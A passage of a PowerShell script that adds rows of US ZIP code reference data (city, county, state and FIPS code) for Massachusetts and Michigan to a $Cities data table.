$Cities.Rows.Add("Mattapan","Suffolk","Massachusetts","MA","25","02126") + $null = $Cities.Rows.Add("South boston","Suffolk","Massachusetts","MA","25","02127") + $null = $Cities.Rows.Add("East boston","Suffolk","Massachusetts","MA","25","02128") + $null = $Cities.Rows.Add("Charlestown","Suffolk","Massachusetts","MA","25","02129") + $null = $Cities.Rows.Add("Jamaica plain","Suffolk","Massachusetts","MA","25","02130") + $null = $Cities.Rows.Add("Roslindale","Suffolk","Massachusetts","MA","25","02131") + $null = $Cities.Rows.Add("West roxbury","Suffolk","Massachusetts","MA","25","02132") + $null = $Cities.Rows.Add("Allston","Suffolk","Massachusetts","MA","25","02134") + $null = $Cities.Rows.Add("Brighton","Suffolk","Massachusetts","MA","25","02135") + $null = $Cities.Rows.Add("Hyde park","Suffolk","Massachusetts","MA","25","02136") + $null = $Cities.Rows.Add("Cambridge","Middlesex","Massachusetts","MA","25","02138") + $null = $Cities.Rows.Add("Cambridge","Middlesex","Massachusetts","MA","25","02139") + $null = $Cities.Rows.Add("North cambridge","Middlesex","Massachusetts","MA","25","02140") + $null = $Cities.Rows.Add("East cambridge","Middlesex","Massachusetts","MA","25","02141") + $null = $Cities.Rows.Add("Cambridge","Middlesex","Massachusetts","MA","25","02142") + $null = $Cities.Rows.Add("Somerville","Middlesex","Massachusetts","MA","25","02143") + $null = $Cities.Rows.Add("Somerville","Middlesex","Massachusetts","MA","25","02144") + $null = $Cities.Rows.Add("Somerville","Middlesex","Massachusetts","MA","25","02145") + $null = $Cities.Rows.Add("Malden","Middlesex","Massachusetts","MA","25","02148") + $null = $Cities.Rows.Add("Everett","Middlesex","Massachusetts","MA","25","02149") + $null = $Cities.Rows.Add("Chelsea","Suffolk","Massachusetts","MA","25","02150") + $null = $Cities.Rows.Add("Revere","Suffolk","Massachusetts","MA","25","02151") + $null = $Cities.Rows.Add("Winthrop","Suffolk","Massachusetts","MA","25","02152") + $null = $Cities.Rows.Add("Medford","Middlesex","Massachusetts","MA","25","02155") + $null = $Cities.Rows.Add("Cambridge","Suffolk","Massachusetts","MA","25","02163") + $null = $Cities.Rows.Add("Quincy","Norfolk","Massachusetts","MA","25","02169") + $null = $Cities.Rows.Add("Quincy","Norfolk","Massachusetts","MA","25","02170") + $null = $Cities.Rows.Add("Quincy","Norfolk","Massachusetts","MA","25","02171") + $null = $Cities.Rows.Add("Melrose","Middlesex","Massachusetts","MA","25","02176") + $null = $Cities.Rows.Add("Stoneham","Middlesex","Massachusetts","MA","25","02180") + $null = $Cities.Rows.Add("Braintree","Norfolk","Massachusetts","MA","25","02184") + $null = $Cities.Rows.Add("Milton","Norfolk","Massachusetts","MA","25","02186") + $null = $Cities.Rows.Add("Weymouth","Norfolk","Massachusetts","MA","25","02188") + $null = $Cities.Rows.Add("Weymouth","Norfolk","Massachusetts","MA","25","02189") + $null = $Cities.Rows.Add("Weymouth","Norfolk","Massachusetts","MA","25","02190") + $null = $Cities.Rows.Add("Weymouth","Norfolk","Massachusetts","MA","25","02191") + $null = $Cities.Rows.Add("Boston","Suffolk","Massachusetts","MA","25","02199") + $null = $Cities.Rows.Add("Zcta 021hh","Norfolk","Massachusetts","MA","25","021HH") + $null = $Cities.Rows.Add("Boston","Suffolk","Massachusetts","MA","25","02210") + $null = $Cities.Rows.Add("Boston","Suffolk","Massachusetts","MA","25","02215") + $null = $Cities.Rows.Add("Boston","Suffolk","Massachusetts","MA","25","02222") + $null = $Cities.Rows.Add("Zcta 022hh","Suffolk","Massachusetts","MA","25","022HH") + $null = $Cities.Rows.Add("Zcta 02301","Plymouth","Massachusetts","MA","25","02301") + $null = $Cities.Rows.Add("Zcta 02302","Plymouth","Massachusetts","MA","25","02302") + $null = $Cities.Rows.Add("Avon","Norfolk","Massachusetts","MA","25","02322") + $null = $Cities.Rows.Add("Bridgewater","Plymouth","Massachusetts","MA","25","02324") + $null = $Cities.Rows.Add("Carver","Plymouth","Massachusetts","MA","25","02330") + $null = $Cities.Rows.Add("Duxbury","Plymouth","Massachusetts","MA","25","02332") + $null = $Cities.Rows.Add("East bridgewater","Plymouth","Massachusetts","MA","25","02333") + $null = $Cities.Rows.Add("Halifax","Plymouth","Massachusetts","MA","25","02338") + $null = $Cities.Rows.Add("Hanover","Plymouth","Massachusetts","MA","25","02339") + $null = $Cities.Rows.Add("Hanson","Plymouth","Massachusetts","MA","25","02341") + $null = $Cities.Rows.Add("Holbrook","Norfolk","Massachusetts","MA","25","02343") + $null = $Cities.Rows.Add("Middleboro","Plymouth","Massachusetts","MA","25","02346") + $null = $Cities.Rows.Add("Lakeville","Plymouth","Massachusetts","MA","25","02347") + $null = $Cities.Rows.Add("Abington","Plymouth","Massachusetts","MA","25","02351") + $null = $Cities.Rows.Add("North easton","Bristol","Massachusetts","MA","25","02356") + $null = $Cities.Rows.Add("North pembroke","Plymouth","Massachusetts","MA","25","02358") + $null = $Cities.Rows.Add("Pembroke","Plymouth","Massachusetts","MA","25","02359") + $null = $Cities.Rows.Add("Plymouth","Plymouth","Massachusetts","MA","25","02360") + $null = $Cities.Rows.Add("Kingston","Plymouth","Massachusetts","MA","25","02364") + $null = $Cities.Rows.Add("South carver","Plymouth","Massachusetts","MA","25","02366") + $null = $Cities.Rows.Add("Plympton","Plymouth","Massachusetts","MA","25","02367") + $null = $Cities.Rows.Add("Randolph","Norfolk","Massachusetts","MA","25","02368") + $null = $Cities.Rows.Add("Rockland","Plymouth","Massachusetts","MA","25","02370") + $null = $Cities.Rows.Add("South easton","Bristol","Massachusetts","MA","25","02375") + $null = $Cities.Rows.Add("West bridgewater","Plymouth","Massachusetts","MA","25","02379") + $null = $Cities.Rows.Add("Whitman","Plymouth","Massachusetts","MA","25","02382") + $null = $Cities.Rows.Add("Zcta 023hh","Plymouth","Massachusetts","MA","25","023HH") + $null = $Cities.Rows.Add("Zcta 023xx","Plymouth","Massachusetts","MA","25","023XX") + $null = $Cities.Rows.Add("Zcta 02420","Middlesex","Massachusetts","MA","25","02420") + $null = $Cities.Rows.Add("Zcta 02421","Middlesex","Massachusetts","MA","25","02421") + $null = $Cities.Rows.Add("Zcta 02445","Norfolk","Massachusetts","MA","25","02445") + $null = $Cities.Rows.Add("Zcta 02446","Norfolk","Massachusetts","MA","25","02446") + $null = $Cities.Rows.Add("Zcta 02451","Middlesex","Massachusetts","MA","25","02451") + $null = $Cities.Rows.Add("Zcta 02452","Middlesex","Massachusetts","MA","25","02452") + $null = $Cities.Rows.Add("Zcta 02453","Middlesex","Massachusetts","MA","25","02453") + $null = $Cities.Rows.Add("Zcta 02458","Middlesex","Massachusetts","MA","25","02458") + $null = $Cities.Rows.Add("Zcta 02459","Middlesex","Massachusetts","MA","25","02459") + $null = $Cities.Rows.Add("Zcta 02460","Middlesex","Massachusetts","MA","25","02460") + $null = $Cities.Rows.Add("Zcta 02461","Middlesex","Massachusetts","MA","25","02461") + $null = $Cities.Rows.Add("Zcta 02462","Middlesex","Massachusetts","MA","25","02462") + $null = $Cities.Rows.Add("Zcta 02464","Middlesex","Massachusetts","MA","25","02464") + $null = $Cities.Rows.Add("Zcta 02465","Middlesex","Massachusetts","MA","25","02465") + $null = $Cities.Rows.Add("Zcta 02466","Middlesex","Massachusetts","MA","25","02466") + $null = $Cities.Rows.Add("Zcta 02467","Middlesex","Massachusetts","MA","25","02467") + $null = $Cities.Rows.Add("Zcta 02468","Middlesex","Massachusetts","MA","25","02468") + $null = $Cities.Rows.Add("Zcta 02472","Middlesex","Massachusetts","MA","25","02472") + $null = $Cities.Rows.Add("Zcta 02474","Middlesex","Massachusetts","MA","25","02474") + $null = $Cities.Rows.Add("Zcta 02476","Middlesex","Massachusetts","MA","25","02476") + $null = $Cities.Rows.Add("Zcta 02478","Middlesex","Massachusetts","MA","25","02478") + $null = $Cities.Rows.Add("Zcta 02481","Norfolk","Massachusetts","MA","25","02481") + $null = $Cities.Rows.Add("Zcta 02482","Norfolk","Massachusetts","MA","25","02482") + $null = $Cities.Rows.Add("Zcta 02492","Norfolk","Massachusetts","MA","25","02492") + $null = $Cities.Rows.Add("Zcta 02493","Middlesex","Massachusetts","MA","25","02493") + $null = $Cities.Rows.Add("Zcta 02494","Norfolk","Massachusetts","MA","25","02494") + $null = $Cities.Rows.Add("Onset","Barnstable","Massachusetts","MA","25","02532") + $null = $Cities.Rows.Add("Cataumet","Barnstable","Massachusetts","MA","25","02534") + $null = $Cities.Rows.Add("Chilmark","Dukes","Massachusetts","MA","25","02535") + $null = $Cities.Rows.Add("Teaticket","Barnstable","Massachusetts","MA","25","02536") + $null = $Cities.Rows.Add("East sandwich","Barnstable","Massachusetts","MA","25","02537") + $null = $Cities.Rows.Add("East wareham","Plymouth","Massachusetts","MA","25","02538") + $null = $Cities.Rows.Add("Edgartown","Dukes","Massachusetts","MA","25","02539") + $null = $Cities.Rows.Add("Falmouth","Barnstable","Massachusetts","MA","25","02540") + $null = $Cities.Rows.Add("Otis a f b","Barnstable","Massachusetts","MA","25","02542") + $null = $Cities.Rows.Add("Woods hole","Barnstable","Massachusetts","MA","25","02543") + $null = $Cities.Rows.Add("Nantucket","Nantucket","Massachusetts","MA","25","02554") + $null = $Cities.Rows.Add("North falmouth","Barnstable","Massachusetts","MA","25","02556") + $null = $Cities.Rows.Add("Onset","Plymouth","Massachusetts","MA","25","02558") + $null = $Cities.Rows.Add("Pocasset","Barnstable","Massachusetts","MA","25","02559") + $null = $Cities.Rows.Add("Sandwich","Barnstable","Massachusetts","MA","25","02563") + $null = $Cities.Rows.Add("Vineyard haven","Dukes","Massachusetts","MA","25","02568") + $null = $Cities.Rows.Add("Wareham","Plymouth","Massachusetts","MA","25","02571") + $null = $Cities.Rows.Add("West tisbury","Dukes","Massachusetts","MA","25","02575") + $null = $Cities.Rows.Add("West wareham","Plymouth","Massachusetts","MA","25","02576") + $null = $Cities.Rows.Add("Zcta 025hh","Barnstable","Massachusetts","MA","25","025HH") + $null = $Cities.Rows.Add("Zcta 025xx","Barnstable","Massachusetts","MA","25","025XX") + $null = $Cities.Rows.Add("West yarmouth","Barnstable","Massachusetts","MA","25","02601") + $null = $Cities.Rows.Add("Barnstable","Barnstable","Massachusetts","MA","25","02630") + $null = $Cities.Rows.Add("Brewster","Barnstable","Massachusetts","MA","25","02631") + $null = $Cities.Rows.Add("Centerville","Barnstable","Massachusetts","MA","25","02632") + $null = $Cities.Rows.Add("South chatham","Barnstable","Massachusetts","MA","25","02633") + $null = $Cities.Rows.Add("Cotuit","Barnstable","Massachusetts","MA","25","02635") + $null = $Cities.Rows.Add("Dennis","Barnstable","Massachusetts","MA","25","02638") + $null = $Cities.Rows.Add("Dennis port","Barnstable","Massachusetts","MA","25","02639") + $null = $Cities.Rows.Add("Eastham","Barnstable","Massachusetts","MA","25","02642") + $null = $Cities.Rows.Add("Forestdale","Barnstable","Massachusetts","MA","25","02644") + $null = $Cities.Rows.Add("Harwich","Barnstable","Massachusetts","MA","25","02645") + $null = $Cities.Rows.Add("Harwich port","Barnstable","Massachusetts","MA","25","02646") + $null = $Cities.Rows.Add("Hyannis port","Barnstable","Massachusetts","MA","25","02647") + $null = $Cities.Rows.Add("Marstons mills","Barnstable","Massachusetts","MA","25","02648") + $null = $Cities.Rows.Add("Mashpee","Barnstable","Massachusetts","MA","25","02649") + $null = $Cities.Rows.Add("North chatham","Barnstable","Massachusetts","MA","25","02650") + $null = $Cities.Rows.Add("North truro","Barnstable","Massachusetts","MA","25","02652") + $null = $Cities.Rows.Add("Orleans","Barnstable","Massachusetts","MA","25","02653") + $null = $Cities.Rows.Add("Osterville","Barnstable","Massachusetts","MA","25","02655") + $null = $Cities.Rows.Add("Provincetown","Barnstable","Massachusetts","MA","25","02657") + $null = $Cities.Rows.Add("South chatham","Barnstable","Massachusetts","MA","25","02659") + $null = $Cities.Rows.Add("South dennis","Barnstable","Massachusetts","MA","25","02660") + $null = $Cities.Rows.Add("South harwich","Barnstable","Massachusetts","MA","25","02661") + $null = $Cities.Rows.Add("Bass river","Barnstable","Massachusetts","MA","25","02664") + $null = $Cities.Rows.Add("Truro","Barnstable","Massachusetts","MA","25","02666") + $null = $Cities.Rows.Add("Wellfleet","Barnstable","Massachusetts","MA","25","02667") + $null = $Cities.Rows.Add("West barnstable","Barnstable","Massachusetts","MA","25","02668") + $null = $Cities.Rows.Add("West chatham","Barnstable","Massachusetts","MA","25","02669") + $null = $Cities.Rows.Add("West dennis","Barnstable","Massachusetts","MA","25","02670") + $null = $Cities.Rows.Add("West harwich","Barnstable","Massachusetts","MA","25","02671") + $null = $Cities.Rows.Add("West hyannisport","Barnstable","Massachusetts","MA","25","02672") + $null = $Cities.Rows.Add("West yarmouth","Barnstable","Massachusetts","MA","25","02673") + $null = $Cities.Rows.Add("Yarmouth port","Barnstable","Massachusetts","MA","25","02675") + $null = $Cities.Rows.Add("Zcta 026hh","Barnstable","Massachusetts","MA","25","026HH") + $null = $Cities.Rows.Add("Assonet","Bristol","Massachusetts","MA","25","02702") + $null = $Cities.Rows.Add("Attleboro","Bristol","Massachusetts","MA","25","02703") + $null = $Cities.Rows.Add("Cuttyhunk","Dukes","Massachusetts","MA","25","02713") + $null = $Cities.Rows.Add("Dighton","Bristol","Massachusetts","MA","25","02715") + $null = $Cities.Rows.Add("East freetown","Bristol","Massachusetts","MA","25","02717") + $null = $Cities.Rows.Add("East taunton","Bristol","Massachusetts","MA","25","02718") + $null = $Cities.Rows.Add("Fairhaven","Bristol","Massachusetts","MA","25","02719") + $null = $Cities.Rows.Add("Fall river","Bristol","Massachusetts","MA","25","02720") + $null = $Cities.Rows.Add("Fall river","Bristol","Massachusetts","MA","25","02721") + $null = $Cities.Rows.Add("Fall river","Bristol","Massachusetts","MA","25","02723") + $null = $Cities.Rows.Add("Fall river","Bristol","Massachusetts","MA","25","02724") + $null = $Cities.Rows.Add("Somerset","Bristol","Massachusetts","MA","25","02725") + $null = $Cities.Rows.Add("Somerset","Bristol","Massachusetts","MA","25","02726") + $null = $Cities.Rows.Add("Marion","Plymouth","Massachusetts","MA","25","02738") + $null = $Cities.Rows.Add("Mattapoisett","Plymouth","Massachusetts","MA","25","02739") + $null = $Cities.Rows.Add("New bedford","Bristol","Massachusetts","MA","25","02740") + $null = $Cities.Rows.Add("Acushnet","Bristol","Massachusetts","MA","25","02743") + $null = $Cities.Rows.Add("New bedford","Bristol","Massachusetts","MA","25","02744") + $null = $Cities.Rows.Add("New bedford","Bristol","Massachusetts","MA","25","02745") + $null = $Cities.Rows.Add("New bedford","Bristol","Massachusetts","MA","25","02746") + $null = $Cities.Rows.Add("North dartmouth","Bristol","Massachusetts","MA","25","02747") + $null = $Cities.Rows.Add("Padanaram villag","Bristol","Massachusetts","MA","25","02748") + $null = $Cities.Rows.Add("North attleboro","Bristol","Massachusetts","MA","25","02760") + $null = $Cities.Rows.Add("Plainville","Norfolk","Massachusetts","MA","25","02762") + $null = $Cities.Rows.Add("North attleboro","Bristol","Massachusetts","MA","25","02763") + $null = $Cities.Rows.Add("North dighton","Bristol","Massachusetts","MA","25","02764") + $null = $Cities.Rows.Add("Norton","Bristol","Massachusetts","MA","25","02766") + $null = $Cities.Rows.Add("Raynham","Bristol","Massachusetts","MA","25","02767") + $null = $Cities.Rows.Add("Rehoboth","Bristol","Massachusetts","MA","25","02769") + $null = $Cities.Rows.Add("Rochester","Plymouth","Massachusetts","MA","25","02770") + $null = $Cities.Rows.Add("Seekonk","Bristol","Massachusetts","MA","25","02771") + $null = $Cities.Rows.Add("Swansea","Bristol","Massachusetts","MA","25","02777") + $null = $Cities.Rows.Add("Berkley","Bristol","Massachusetts","MA","25","02779") + $null = $Cities.Rows.Add("Taunton","Bristol","Massachusetts","MA","25","02780") + $null = $Cities.Rows.Add("Westport","Bristol","Massachusetts","MA","25","02790") + $null = $Cities.Rows.Add("Zcta 027hh","Bristol","Massachusetts","MA","25","027HH") + $null = $Cities.Rows.Add("Pearl beach","St. Clair","Michigan","MI","26","48001") + $null = $Cities.Rows.Add("Berlin","St. Clair","Michigan","MI","26","48002") + $null = $Cities.Rows.Add("Almont","Lapeer","Michigan","MI","26","48003") + $null = $Cities.Rows.Add("Armada","Macomb","Michigan","MI","26","48005") + $null = $Cities.Rows.Add("Greenwood","St. Clair","Michigan","MI","26","48006") + $null = $Cities.Rows.Add("Birmingham","Oakland","Michigan","MI","26","48009") + $null = $Cities.Rows.Add("Mussey","St. Clair","Michigan","MI","26","48014") + $null = $Cities.Rows.Add("Center line","Macomb","Michigan","MI","26","48015") + $null = $Cities.Rows.Add("Clawson","Oakland","Michigan","MI","26","48017") + $null = $Cities.Rows.Add("Eastpointe","Macomb","Michigan","MI","26","48021") + $null = $Cities.Rows.Add("Emmett","St. Clair","Michigan","MI","26","48022") + $null = $Cities.Rows.Add("Ira","St. Clair","Michigan","MI","26","48023") + $null = $Cities.Rows.Add("Franklin","Oakland","Michigan","MI","26","48025") + $null = $Cities.Rows.Add("Fraser","Macomb","Michigan","MI","26","48026") + $null = $Cities.Rows.Add("Wales","St. Clair","Michigan","MI","26","48027") + $null = $Cities.Rows.Add("Harsens island","St. Clair","Michigan","MI","26","48028") + $null = $Cities.Rows.Add("Hazel park","Oakland","Michigan","MI","26","48030") + $null = $Cities.Rows.Add("Grant township","St. Clair","Michigan","MI","26","48032") + $null = $Cities.Rows.Add("Southfield","Oakland","Michigan","MI","26","48034") + $null = $Cities.Rows.Add("Clinton township","Macomb","Michigan","MI","26","48035") + $null = $Cities.Rows.Add("Clinton township","Macomb","Michigan","MI","26","48036") + $null = $Cities.Rows.Add("Clinton township","Macomb","Michigan","MI","26","48038") + $null = $Cities.Rows.Add("Cottrellville","St. Clair","Michigan","MI","26","48039") + $null = $Cities.Rows.Add("Marysville","St. Clair","Michigan","MI","26","48040") + $null = $Cities.Rows.Add("Riley","St. Clair","Michigan","MI","26","48041") + $null = $Cities.Rows.Add("Macomb","Macomb","Michigan","MI","26","48042") + $null = $Cities.Rows.Add("Mount clemens","Macomb","Michigan","MI","26","48043") + $null = $Cities.Rows.Add("Macomb","Macomb","Michigan","MI","26","48044") + $null = $Cities.Rows.Add("Selfridge a n g","Macomb","Michigan","MI","26","48045") + $null = $Cities.Rows.Add("Chesterfield","Macomb","Michigan","MI","26","48047") + $null = $Cities.Rows.Add("Lenox","Macomb","Michigan","MI","26","48048") + $null = $Cities.Rows.Add("Ruby","St. Clair","Michigan","MI","26","48049") + $null = $Cities.Rows.Add("Lenox","Macomb","Michigan","MI","26","48050") + $null = $Cities.Rows.Add("Chesterfield","Macomb","Michigan","MI","26","48051") + $null = $Cities.Rows.Add("China","St. Clair","Michigan","MI","26","48054") + $null = $Cities.Rows.Add("Fort gratiot","St. Clair","Michigan","MI","26","48059") + $null = $Cities.Rows.Add("Port huron","St. Clair","Michigan","MI","26","48060") + $null = $Cities.Rows.Add("Richmond","Macomb","Michigan","MI","26","48062") + $null = $Cities.Rows.Add("Columbus","St. Clair","Michigan","MI","26","48063") + $null = $Cities.Rows.Add("Casco","St. Clair","Michigan","MI","26","48064") + $null = $Cities.Rows.Add("Bruce","Macomb","Michigan","MI","26","48065") + $null = $Cities.Rows.Add("Roseville","Macomb","Michigan","MI","26","48066") + $null = $Cities.Rows.Add("Royal oak","Oakland","Michigan","MI","26","48067") + $null = $Cities.Rows.Add("Pleasant ridge","Oakland","Michigan","MI","26","48069") + $null = $Cities.Rows.Add("Huntington woods","Oakland","Michigan","MI","26","48070") + $null = $Cities.Rows.Add("Madison heights","Oakland","Michigan","MI","26","48071") + $null = $Cities.Rows.Add("Berkley","Oakland","Michigan","MI","26","48072") + $null = $Cities.Rows.Add("Royal oak","Oakland","Michigan","MI","26","48073") + $null = $Cities.Rows.Add("Kimball","St. Clair","Michigan","MI","26","48074") + $null = $Cities.Rows.Add("Southfield","Oakland","Michigan","MI","26","48075") + $null = $Cities.Rows.Add("Lathrup village","Oakland","Michigan","MI","26","48076") + $null = $Cities.Rows.Add("Saint clair","St. Clair","Michigan","MI","26","48079") + $null = $Cities.Rows.Add("Saint clair shor","Macomb","Michigan","MI","26","48080") + $null = $Cities.Rows.Add("Saint clair shor","Macomb","Michigan","MI","26","48081") + $null = $Cities.Rows.Add("Saint clair shor","Macomb","Michigan","MI","26","48082") + $null = $Cities.Rows.Add("Troy","Oakland","Michigan","MI","26","48083") + $null = $Cities.Rows.Add("Troy","Oakland","Michigan","MI","26","48084") + $null = $Cities.Rows.Add("Warren","Macomb","Michigan","MI","26","48089") + $null = $Cities.Rows.Add("Warren","Macomb","Michigan","MI","26","48091") + $null = $Cities.Rows.Add("Warren","Macomb","Michigan","MI","26","48092") + $null = $Cities.Rows.Add("Warren","Macomb","Michigan","MI","26","48093") + $null = $Cities.Rows.Add("Washington","Macomb","Michigan","MI","26","48094") + $null = $Cities.Rows.Add("Washington","Macomb","Michigan","MI","26","48095") + $null = $Cities.Rows.Add("Ray","Macomb","Michigan","MI","26","48096") + $null = $Cities.Rows.Add("Brockway","St. Clair","Michigan","MI","26","48097") + $null = $Cities.Rows.Add("Troy","Oakland","Michigan","MI","26","48098") + $null = $Cities.Rows.Add("Zcta 480hh","Macomb","Michigan","MI","26","480HH") + $null = $Cities.Rows.Add("Allen park","Wayne","Michigan","MI","26","48101") + $null = $Cities.Rows.Add("Ann arbor","Washtenaw","Michigan","MI","26","48103") + $null = $Cities.Rows.Add("Ann arbor","Washtenaw","Michigan","MI","26","48104") + $null = $Cities.Rows.Add("Ann arbor","Washtenaw","Michigan","MI","26","48105") + $null = $Cities.Rows.Add("Ann arbor","Washtenaw","Michigan","MI","26","48108") + $null = $Cities.Rows.Add("Ann arbor","Washtenaw","Michigan","MI","26","48109") + $null = $Cities.Rows.Add("Belleville","Wayne","Michigan","MI","26","48111") + $null = $Cities.Rows.Add("Zcta 48114","Livingston","Michigan","MI","26","48114") + $null = $Cities.Rows.Add("Brighton","Livingston","Michigan","MI","26","48116") + $null = $Cities.Rows.Add("Carleton","Monroe","Michigan","MI","26","48117") + $null = $Cities.Rows.Add("Chelsea","Washtenaw","Michigan","MI","26","48118") + $null = $Cities.Rows.Add("Dearborn","Wayne","Michigan","MI","26","48120") + $null = $Cities.Rows.Add("Melvindale","Wayne","Michigan","MI","26","48122") + $null = $Cities.Rows.Add("Dearborn","Wayne","Michigan","MI","26","48124") + $null = $Cities.Rows.Add("Dearborn heights","Wayne","Michigan","MI","26","48125") + $null = $Cities.Rows.Add("Dearborn","Wayne","Michigan","MI","26","48126") + $null = $Cities.Rows.Add("Dearborn heights","Wayne","Michigan","MI","26","48127") + $null = $Cities.Rows.Add("Dearborn","Wayne","Michigan","MI","26","48128") + $null = $Cities.Rows.Add("Dexter","Washtenaw","Michigan","MI","26","48130") + $null = $Cities.Rows.Add("Dundee","Monroe","Michigan","MI","26","48131") + $null = $Cities.Rows.Add("Erie","Monroe","Michigan","MI","26","48133") + $null = $Cities.Rows.Add("Flat rock","Wayne","Michigan","MI","26","48134") + $null = $Cities.Rows.Add("Garden city","Wayne","Michigan","MI","26","48135") + $null = $Cities.Rows.Add("Gregory","Livingston","Michigan","MI","26","48137") + $null = $Cities.Rows.Add("Grosse ile","Wayne","Michigan","MI","26","48138") + $null = $Cities.Rows.Add("Hamburg","Livingston","Michigan","MI","26","48139") + $null = $Cities.Rows.Add("Ida","Monroe","Michigan","MI","26","48140") + $null = $Cities.Rows.Add("Inkster","Wayne","Michigan","MI","26","48141") + $null = $Cities.Rows.Add("Lakeland","Livingston","Michigan","MI","26","48143") + $null = $Cities.Rows.Add("Lambertville","Monroe","Michigan","MI","26","48144") + $null = $Cities.Rows.Add("La salle","Monroe","Michigan","MI","26","48145") + $null = $Cities.Rows.Add("Lincoln park","Wayne","Michigan","MI","26","48146") + $null = $Cities.Rows.Add("Livonia","Wayne","Michigan","MI","26","48150") + $null = $Cities.Rows.Add("Livonia","Wayne","Michigan","MI","26","48152") + $null = $Cities.Rows.Add("Livonia","Wayne","Michigan","MI","26","48154") + $null = $Cities.Rows.Add("Luna pier","Monroe","Michigan","MI","26","48157") + $null = $Cities.Rows.Add("Manchester","Washtenaw","Michigan","MI","26","48158") + $null = $Cities.Rows.Add("Maybee","Monroe","Michigan","MI","26","48159") + $null = $Cities.Rows.Add("Milan","Washtenaw","Michigan","MI","26","48160") + $null = $Cities.Rows.Add("Detroit beach","Monroe","Michigan","MI","26","48161") + $null = $Cities.Rows.Add("Zcta 48162","Monroe","Michigan","MI","26","48162") + $null = $Cities.Rows.Add("New boston","Wayne","Michigan","MI","26","48164") + $null = $Cities.Rows.Add("New hudson","Oakland","Michigan","MI","26","48165") + $null = $Cities.Rows.Add("Newport","Monroe","Michigan","MI","26","48166") + $null = $Cities.Rows.Add("Northville","Wayne","Michigan","MI","26","48167") + $null = $Cities.Rows.Add("Pinckney","Livingston","Michigan","MI","26","48169") + $null = $Cities.Rows.Add("Plymouth","Wayne","Michigan","MI","26","48170") + $null = $Cities.Rows.Add("Gibraltar","Wayne","Michigan","MI","26","48173") + $null = $Cities.Rows.Add("Romulus","Wayne","Michigan","MI","26","48174") + $null = $Cities.Rows.Add("Saline","Washtenaw","Michigan","MI","26","48176") + $null = $Cities.Rows.Add("South lyon","Oakland","Michigan","MI","26","48178") + $null = $Cities.Rows.Add("South rockwood","Monroe","Michigan","MI","26","48179") + $null = $Cities.Rows.Add("Taylor","Wayne","Michigan","MI","26","48180") + $null = $Cities.Rows.Add("Temperance","Monroe","Michigan","MI","26","48182") + $null = $Cities.Rows.Add("Woodhaven","Wayne","Michigan","MI","26","48183") + $null = $Cities.Rows.Add("Wayne","Wayne","Michigan","MI","26","48184") + $null = $Cities.Rows.Add("Westland","Wayne","Michigan","MI","26","48185") + $null = $Cities.Rows.Add("Zcta 48186","Wayne","Michigan","MI","26","48186") + $null = $Cities.Rows.Add("Canton","Wayne","Michigan","MI","26","48187") + $null = $Cities.Rows.Add("Canton","Wayne","Michigan","MI","26","48188") + $null = $Cities.Rows.Add("Whitmore lake","Washtenaw","Michigan","MI","26","48189") + $null = $Cities.Rows.Add("Whittaker","Washtenaw","Michigan","MI","26","48190") + $null = $Cities.Rows.Add("Willis","Washtenaw","Michigan","MI","26","48191") + $null = $Cities.Rows.Add("Riverview","Wayne","Michigan","MI","26","48192") + $null = $Cities.Rows.Add("Southgate","Wayne","Michigan","MI","26","48195") + $null = $Cities.Rows.Add("Ypsilanti","Washtenaw","Michigan","MI","26","48197") + $null = $Cities.Rows.Add("Ypsilanti","Washtenaw","Michigan","MI","26","48198") + $null = $Cities.Rows.Add("Zcta 481hh","Livingston","Michigan","MI","26","481HH") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48201") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48202") + $null = $Cities.Rows.Add("Highland park","Wayne","Michigan","MI","26","48203") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48204") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48205") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48206") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48207") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48208") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48209") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48210") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48211") + $null = $Cities.Rows.Add("Hamtramck","Wayne","Michigan","MI","26","48212") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48213") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48214") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48215") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48216") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48217") + $null = $Cities.Rows.Add("River rouge","Wayne","Michigan","MI","26","48218") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48219") + $null = $Cities.Rows.Add("Ferndale","Oakland","Michigan","MI","26","48220") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48221") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48223") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48224") + $null = $Cities.Rows.Add("Harper woods","Wayne","Michigan","MI","26","48225") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48226") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48227") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48228") + $null = $Cities.Rows.Add("Ecorse","Wayne","Michigan","MI","26","48229") + $null = $Cities.Rows.Add("Grosse pointe","Wayne","Michigan","MI","26","48230") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48234") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48235") + $null = $Cities.Rows.Add("Grosse pointe","Wayne","Michigan","MI","26","48236") + $null = $Cities.Rows.Add("Oak park","Oakland","Michigan","MI","26","48237") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48238") + $null = $Cities.Rows.Add("Redford","Wayne","Michigan","MI","26","48239") + $null = $Cities.Rows.Add("Redford","Wayne","Michigan","MI","26","48240") + $null = $Cities.Rows.Add("Detroit","Wayne","Michigan","MI","26","48242") + $null = $Cities.Rows.Add("Zcta 482hh","Macomb","Michigan","MI","26","482HH") + $null = $Cities.Rows.Add("Bloomfield towns","Oakland","Michigan","MI","26","48301") + $null = $Cities.Rows.Add("Bloomfield towns","Oakland","Michigan","MI","26","48302") + $null = 